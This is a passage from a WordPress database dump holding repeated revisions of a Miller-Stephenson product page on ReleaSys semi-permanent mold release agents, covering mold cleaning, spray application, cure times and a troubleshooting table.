'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2712, 3, '2016-10-24 13:54:51', '2016-10-24 13:54:51', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release accompanied by small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:54:51', '2016-10-24 13:54:51', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2713, 3, '2016-10-24 13:57:03', '2016-10-24 13:57:03', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release accompanied by small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:57:03', '2016-10-24 13:57:03', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2714, 3, '2016-10-24 13:57:33', '2016-10-24 13:57:33', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li style="text-align: justify;">When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li style="text-align: justify;"><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol>\r\n 	<li style="text-align: justify;">When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li style="text-align: justify;">When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">       </span>   <span style="color: #808080;"> <span style="font-size: 120%;" data-text-color="primary">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span style="text-decoration: underline; color: #ff0000;"><strong>Cause</strong></span></span></td>\r\n<td style="text-align: justify;" width="680"><span style="font-size: 120%;">                                              <span style="text-decoration: underline; color: #0000ff;"><strong>Solution</strong></span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Complete failure to obtain release</strong></td>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Improperly cure ReleaSys</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Ensure ReleaSys is properly cured; apply heat to mold if possible or allow  for more time</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><span style="color: #ed1c24; font-size: 120%;">›</span> Phase-separation of ReleaSys as a result of over    agitation or mixing</td>\r\n<td>• Examine ReleaSys; If separation occurred replace with fresh material</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><strong>Poor Release in strained molding areas</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Lack of slip due to mold geometry application angle</td>\r\n<td>• Apply one or two extra coats of ReleaSys initially; Re-apply touch-up coats to these areas more frequently</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Good release but build-up of ReleaSys on mold surface.</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="2" width="241"><strong>Good release but parts exhibit  blemishes or oily patches</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Over-application of ReleaSys</td>\r\n<td>• Thoroughly clean mold and re-apply ReleaSys in lighter coats; Adjust  spray gun to dispense lower volume</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Insufficient cure time</td>\r\n<td>• Apply lighter coats of ReleaSys and increase cure time allowed and/or increase cure temperature</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><strong>Inability to achieve multiple releases</strong></td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Mold insufficiently cleaned prior to application preventing  ReleaSys from bonding</td>\r\n<td>• Mechanical clean mold followed by chemical cleaning; reapply ReleaSys</td>\r\n</tr>\r\n<tr>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Improper application; non-uniform coverage</td>\r\n<td>• Clean mold; apply light coats of ReleaSys with 50% overlapp between      passess.</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="241"><strong>Poor release accompanied by small particles of molding material left on mold surface</strong>.</td>\r\n<td><span style="color: #ed1c24; font-size: 120%;">›</span> Micro-porosity present in mold</td>\r\n<td>• Clean mold; apply 4-5 coats of ReleaSys to seal mold surface allow for  extended cure times on the first 2 coats.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:57:33', '2016-10-24 13:57:33', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2715, 3, '2016-10-24 13:58:09', '2016-10-24 13:58:09', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong><span style="text-decoration: underline;">Mold Release Application 